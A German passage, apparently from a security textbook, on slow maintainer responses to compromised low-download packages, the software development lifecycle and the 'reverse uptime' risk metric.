Außerdem ist es unwahrscheinlich, dass Pakete mit einer geringeren Anzahl von Installationen schnell auf eine gemeldete Kompromittierung reagieren, wie Abbildung 4-9 zeigt. Es könnte sein, dass die Entwickler nicht dafür bezahlt werden, diese Open-Source-Pakete zu betreuen. Die Schaffung von Anreizen für diese Betreuer mit gut geschriebenen Patches und rechtzeitiger Unterstützung beim Einbinden dieser Patches oder finanzielle Unterstützung für die Bearbeitung von Meldungen im Rahmen eines Bug Bounty-Programms sind wirksame Möglichkeiten, um Schwachstellen in beliebten, aber selten betreuten Paketen zu verringern.

Abbildung 4-9. Korrelation zwischen der Anzahl der Persistenztage und der Anzahl der Downloads (R&R = Reported and Removed; R&I = Reported and Investigating) (Quelle: "Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages")

Schwachstellen in der Anwendung während des SDLC

Der Softwareentwicklungszyklus (SDLC) ist der Weg einer Anwendung vom ersten Gedanken eines Entwicklers bis zur sicheren Erstellung und Bereitstellung auf Produktionssystemen.

Wenn Anwendungen von der Entwicklung zur Produktion übergehen, haben sie ein unterschiedliches Risikoprofil, wie Tabelle 4-6 zeigt.

Das Risikoprofil einer Anwendung, die in der Produktion läuft, ändert sich mit zunehmender Lebensdauer, da die Software immer veralteter wird. Dies wird als "Reverse Uptime" bezeichnet - die Korrelation zwischen dem Risiko, dass eine Anwendung kompromittiert wird, und der Zeit seit ihrer Bereitstellung (z. B. dem Datum des Builds des Containers). Die durchschnittliche Rückwärtsverfügbarkeit in einem Unternehmen kann auch als "mittlere Zeit bis ..." bezeichnet werden:

• Kompromittierung (Anwendung hat eine aus der Ferne ausnutzbare Schwachstelle)

• Ausfall (Anwendung funktioniert nicht mehr mit dem aktualisierten System oder externen APIs)

• Aktualisieren (Anwendungscode ändern)

• Patch (um die Versionen der Abhängigkeiten explizit zu aktualisieren)

• Rebuild (um neue Server Abhängigkeiten zu ziehen)